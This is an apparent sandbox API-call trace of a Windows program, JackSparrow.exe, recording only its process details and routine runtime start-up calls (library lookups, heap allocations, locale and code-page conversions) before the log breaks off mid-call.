# Flog Txt Version 1 # Analyzer Version: 3.2.1 # Analyzer Build Date: Feb 5 2020 10:35:20 # Log Creation Date: 15.02.2020 08:22:07.207 Process: id = "1" image_name = "jacksparrow.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jacksparrow.exe" page_root = "0x33b56000" os_pid = "0x35c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x444" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xb04 [0025.913] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6cf858 | out: lpSystemTimeAsFileTime=0x6cf858*(dwLowDateTime=0x10127880, dwHighDateTime=0x1d5e3d9)) [0025.913] GetCurrentThreadId () returned 0xb04 [0025.913] GetCurrentProcessId () returned 0x35c [0025.913] QueryPerformanceCounter (in: lpPerformanceCount=0x6cf850 | out: lpPerformanceCount=0x6cf850*=16787950860) returned 1 [0025.957] GetStartupInfoW (in: lpStartupInfo=0x6cf7e8 | out: lpStartupInfo=0x6cf7e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7733fd35, hStdError=0x773a7daf)) [0025.957] GetProcessHeap () returned 0x770000 [0025.958] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e10000 [0025.958] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0025.958] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventExW") returned 0x76ea410b [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreExW") returned 0x76ea4195 [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadStackGuarantee") returned 0x76e2d31f [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolTimer") returned 0x76e3ee7e [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolTimer") returned 0x7736441c [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7738c50e [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolTimer") returned 0x7738c381 [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolWait") returned 0x76e3f088 [0025.959] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolWait") returned 0x773705d7 [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolWait") returned 0x7738ca24 [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="FlushProcessWriteBuffers") returned 0x77340b8c [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x773ffde8 [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessorNumber") returned 0x77391e1d [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalProcessorInformation") returned 0x76ea4761 [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSymbolicLinkW") returned 0x76e9cd11 [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesEx") returned 0x76ea424f [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringEx") returned 0x76ea46b1 [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatEx") returned 0x76eb6676 [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoEx") returned 0x76ea4751 [0025.960] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatEx") returned 0x76eb65f1 [0025.961] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLocaleName") returned 0x76ea47c1 [0025.961] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocaleName") returned 0x76ea47e1 [0025.961] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0025.961] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentPackageId") returned 0x0 [0025.961] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount64") returned 0x76e3eee0 [0025.961] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0025.961] GetProcAddress (hModule=0x76e10000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0025.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x3bc) returned 0x791fd8 [0025.961] GetCurrentThreadId () returned 0xb04 [0025.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x782a78 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x800) returned 0x7923a0 [0025.962] GetStartupInfoW (in: lpStartupInfo=0x6cf7b8 | out: lpStartupInfo=0x6cf7b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1299d0d, hStdOutput=0xf9645e72, hStdError=0x0)) [0025.962] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0025.962] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0025.962] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0025.962] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe\" " [0025.962] GetEnvironmentStringsW () returned 0x792ba8* [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xaca) returned 0x793680 [0025.962] FreeEnvironmentStringsW (penv=0x792ba8) returned 1 [0025.962] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1334ba8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jacksparrow.exe")) returned 0x35 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74) returned 0x77f8d0 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x98) returned 0x792ba8 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x3e) returned 0x781dd8 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x6c) returned 0x792c48 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x6e) returned 0x792cc0 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x78) returned 0x77f950 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x62) returned 0x782a98 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x2e) returned 0x78c688 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x48) returned 0x788220 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x28) returned 0x78c0b0 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x1a) returned 0x78fc18 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x4a) returned 0x792d38 [0025.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x72) returned 0x77f9d0 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x30) returned 0x78c6c0 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x2e) returned 0x78c6f8 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x1c) returned 0x78fc40 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0xd2) returned 0x792d90 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x7c) returned 0x792e70 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x36) returned 0x792ef8 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x3a) returned 0x781e20 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x90) returned 0x792f38 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x24) returned 0x78c0e0 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x30) returned 0x78c730 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x36) returned 0x792fd0 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x48) returned 0x788270 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x52) returned 0x793010 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x3c) returned 0x781e68 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x82) returned 0x793070 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x2e) returned 0x78c768 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x1e) returned 0x78fc68 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x2c) returned 0x78c7a0 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x54) returned 0x794170 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x52) returned 0x7941d0 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x2a) returned 0x78c7d8 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x3c) returned 0x781eb0 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x54) returned 0x794230 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x24) returned 0x78c110 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x30) returned 0x78c810 [0025.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x8c) returned 0x793100 [0025.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793680 | out: hHeap=0x770000) returned 1 [0025.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x80) returned 0x795158 [0025.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x800) returned 0x7951e0 [0025.964] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0025.964] GetLastError () returned 0x0 [0025.964] SetLastError (dwErrCode=0x0) [0025.964] GetLastError () returned 0x0 [0025.964] SetLastError (dwErrCode=0x0) [0025.964] GetLastError () returned 0x0 [0025.964] SetLastError (dwErrCode=0x0) [0025.964] GetACP () returned 0x4e4 [0025.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x220) returned 0x7959e8 [0025.964] GetLastError () returned 0x0 [0025.964] SetLastError (dwErrCode=0x0) [0025.964] IsValidCodePage (CodePage=0x4e4) returned 1 [0025.964] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x6cf7ac | out: lpCPInfo=0x6cf7ac) returned 1 [0025.964] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x6cf274 | out: lpCPInfo=0x6cf274) returned 1 [0025.964] GetLastError () returned 0x0 [0025.964] SetLastError (dwErrCode=0x0) [0025.964] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6cf688, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0025.964] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6cf688, cbMultiByte=256, lpWideCharStr=0x6ceff8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0025.964] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x6cf288 | out: lpCharType=0x6cf288) returned 1 [0025.965] GetLastError () returned 0x0 [0025.984] SetLastError (dwErrCode=0x0) [0025.984] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6cf688, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0025.984] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6cf688, cbMultiByte=256, lpWideCharStr=0x6cefc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0025.984] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0025.984] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x6cedb8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0025.984] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x6cf588, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿâQdùÄ÷l", lpUsedDefaultChar=0x0) returned 256 [0025.984] GetLastError () returned 0x0 [0025.984] SetLastError (dwErrCode=0x0) [0025.985] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6cf688, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0025.985] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6cf688, cbMultiByte=256, lpWideCharStr=0x6cefd8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0025.985] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0025.985] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x6cedc8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0025.985] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x6cf488, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 